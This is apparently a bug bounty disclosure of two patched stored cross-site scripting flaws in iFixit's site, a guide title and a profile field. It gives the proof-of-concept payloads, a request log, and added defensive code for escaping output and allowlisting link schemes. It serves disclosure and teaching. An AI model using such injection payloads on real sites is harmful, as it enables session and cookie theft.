ifixit Bug Bounty Program 2016 Q1 - Multiple Vulnerabilities disclosed by Core Researcher

Over the last three weeks the vulnerability researcher and core team member "hadji samir" reported several valid bugs to the iFixit company. The issues were disclosed in iFixit's online web application.

The first vulnerability is a persistent (stored) cross-site scripting issue in the `title` value of a guide, which is later rendered by the `guides` and `prerequisite guides` search modules. Remote attackers with a low-privileged web-application user account can store their own script code on the application side through the POST request that creates a guide. The attack vector is therefore persistent: the payload is saved with the guide title and executes in the search module as soon as the injected guide appears among the `guides` or `prerequisite guides` results matched by a keyword.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] guides
[+] prerequisite guides

Vulnerable Parameter(s):
[+] title name (Guide)

Affected Module(s):
[+] Search Guide

PoC: Exploit code (rendered prerequisite entry; the stored title is inserted without HTML encoding)
<div class="prereqBody">
<i class="fa fa-minus-circle delete"></i>

<span class="prereqName">Samir"><img src="c" onerror=alert(document.domain)></span>
</div>

--- PoC Session Logs [POST] ---
Status: 201[Created]
POST https://www.ifixit.com/api/2.0/guides
Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Content Size[2192] Mime Type[application/json]
   Request Headers:
      Host[www.ifixit.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/javascript, text/html, application/xml, text/xml, */*]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
      X-Requested-With[XMLHttpRequest]
      X-HTTP-Method-Override[POST]
      X-CSRF[5vq44aqiks]
      X-ALLOW-HTTP[true]
      Api-Client[iFixit-Web]
      Content-Type[application/x-www-form-urlencoded; charset=utf-8]
      Referer[https://www.ifixit.com/Guide/new]
      Content-Length[312]
      Cookie[_ga=
      Connection[keep-alive]
   Post Data:

      {"type":"replacement","category":"test","subject":"test","title":"Samir\"><img src=\"c\" onerror=alert(document.domain)> Replacement","summary":"test","introduction":"","flags":[],"image":null,"langid":"en"}]
   Response Headers:
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      x-content-type-options[nosniff]
      X-Max-Age[30m]
      Content-Type[application/json]
      Content-Length[2192]
      Accept-Ranges[bytes]
      Date[Mon, 01 Feb 2016 13:52:16 GMT]
      X-Varnish[166966529]
      Age[0]
      X-Debug-Deliver[True]
      X-Debug-Cache[MISS]
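The following is an added example, not iFixit's code: it models the prerequisite-guide entry shown in the PoC above, rendered once the vulnerable way (raw string interpolation of the stored title) and once with the title HTML-escaped. The function names and the template structure are assumptions based only on the PoC markup; the title string is the one stored by the POST in the session log.

```javascript
// Added example (not iFixit's code). Function names and the template are
// assumptions modelled on the PoC markup above.

// Guide title exactly as stored by the guide-creation POST in the session log.
const PAYLOAD_TITLE = 'Samir"><img src="c" onerror=alert(document.domain)> Replacement';

// Vulnerable rendering: the stored title is concatenated into the markup, so
// the '"><img ...>' fragment is parsed by the browser as a new element.
function renderPrereqVulnerable(title) {
  return '<div class="prereqBody">' +
    '<i class="fa fa-minus-circle delete"></i>' +
    '<span class="prereqName">' + title + '</span>' +
    '</div>';
}

// HTML-escape the five characters that can change parser state in element
// text or inside a double-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, title passed through escapeHtml first.
function renderPrereqSafe(title) {
  return '<div class="prereqBody">' +
    '<i class="fa fa-minus-circle delete"></i>' +
    '<span class="prereqName">' + escapeHtml(title) + '</span>' +
    '</div>';
}

// Check used when reviewing output: the template itself never emits these
// start tags, so any occurrence must have come from user data.
function containsInjectedTag(html) {
  return /<(img|script|svg|iframe)\b/i.test(html);
}

// Stand-alone demo.
console.log('vulnerable:', renderPrereqVulnerable(PAYLOAD_TITLE));
console.log('safe:      ', renderPrereqSafe(PAYLOAD_TITLE));
```

In a browser the equivalent fix for client-side rendering is to assign the title with `span.textContent = title` instead of building an HTML string; the API accepting the title (the 201 response above) does not by itself cause the bug, the unencoded output does.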

The second vulnerability is a persistent cross-site scripting issue in the `additional information` input field of the `my profile > about me` web-application module. Remote attackers with a low-privileged web-application user account can store their own script code in the profile context; the input is saved via POST and the payload executes whenever the profile page is viewed. As the PoC below shows, the `link` attribute of the site's `[image|...]` markup is accepted with a `javascript:` URI, so no HTML tag is needed at all.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] my profile > about me

Vulnerable Input(s):
[+] additional information

Affected Module(s):
[+] my profile

Manual steps to reproduce the vulnerability:
1. Open my profile > About me > Additional Information
2. Enter your own script code payload in the Additional Information input field
3. Save the entry
4. Revisit the my profile page
5. The payload executes; the vulnerability is reproduced.

PoC:
[image|100|caption=<click here >|link=javascript:alert(document.cookie)]
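The following is an added example, not iFixit's code: a minimal renderer for the `[image|ID|caption=...|link=...]` markup shape seen in the PoC above. It shows why HTML-escaping the values is not enough when the `link` attribute lands in an `href` unchecked, and the scheme allowlist that closes the hole. The grammar, the `/images/<id>` path and the function names are assumptions based only on that single PoC line.

```javascript
// Added example (not iFixit's code). Markup grammar, image path and function
// names are assumptions modelled on the single PoC line above.

const PAYLOAD_MARKUP = '[image|100|caption=<click here >|link=javascript:alert(document.cookie)]';

function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Parse "[image|ID|key=value|key=value]" into an attribute object, or null.
function parseImageTag(markup) {
  const m = /^\[image\|([^|\]]+)((?:\|[^\]]*)?)\]$/.exec(String(markup).trim());
  if (!m) return null;
  const attrs = { id: m[1] };
  for (const part of m[2].split('|').slice(1)) {
    const eq = part.indexOf('=');
    if (eq > 0) attrs[part.slice(0, eq).trim()] = part.slice(eq + 1);
  }
  return attrs;
}

// Allowlist for href values: same-site relative paths plus http(s)/mailto
// absolute URLs. ASCII controls and spaces are stripped before the scheme is
// read because browsers ignore them, so "java\tscript:" still executes.
function isSafeLink(url) {
  const s = String(url).replace(/[\u0000-\u0020]/g, '').toLowerCase();
  if (!s) return false;
  const colon = s.indexOf(':');
  const delim = s.search(/[\/?#]/);
  const hasScheme = colon >= 0 && (delim < 0 || colon < delim);
  if (!hasScheme) return !s.startsWith('//'); // relative path; reject protocol-relative
  return ['http', 'https', 'mailto'].includes(s.slice(0, colon));
}

function imageElement(attrs) {
  // "/images/<id>" is a placeholder path, not iFixit's real image URL layout.
  return '<img src="/images/' + encodeURIComponent(attrs.id) + '" alt="' +
    escapeHtml(attrs.caption || '') + '">';
}

// Vulnerable: every value is HTML-escaped, yet "javascript:alert(...)" contains
// no escapable character, so it reaches href intact and runs on click.
function renderImageTagVulnerable(markup) {
  const a = parseImageTag(markup);
  if (!a) return escapeHtml(markup);
  const img = imageElement(a);
  return a.link ? '<a href="' + escapeHtml(a.link) + '">' + img + '</a>' : img;
}

// Hardened: the link is only emitted when its scheme is on the allowlist;
// otherwise the image is rendered without a link.
function renderImageTagSafe(markup) {
  const a = parseImageTag(markup);
  if (!a) return escapeHtml(markup);
  const img = imageElement(a);
  return a.link && isSafeLink(a.link)
    ? '<a href="' + escapeHtml(a.link) + '">' + img + '</a>'
    : img;
}

// Stand-alone demo.
console.log('vulnerable:', renderImageTagVulnerable(PAYLOAD_MARKUP));
console.log('safe:      ', renderImageTagSafe(PAYLOAD_MARKUP));
```

The point of the two renderers is that output encoding is context-specific: escaping protects the HTML text and attribute contexts, but a URL context needs a scheme allowlist, which is what the `javascript:` payload in the PoC exploits.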

Both issues have since been patched by the vendor. In addition to the regular bug bounty reward, the core team researcher received a "lock picking gift" from iFixit. The third issue is not yet public; we will keep you updated.

Advisories:

http://www.vulnerability-lab.com/get_content.php?id=1700

http://www.vulnerability-lab.com/get_content.php?id=1701

http://www.vulnerability-lab.com/get_content.php?id=1675
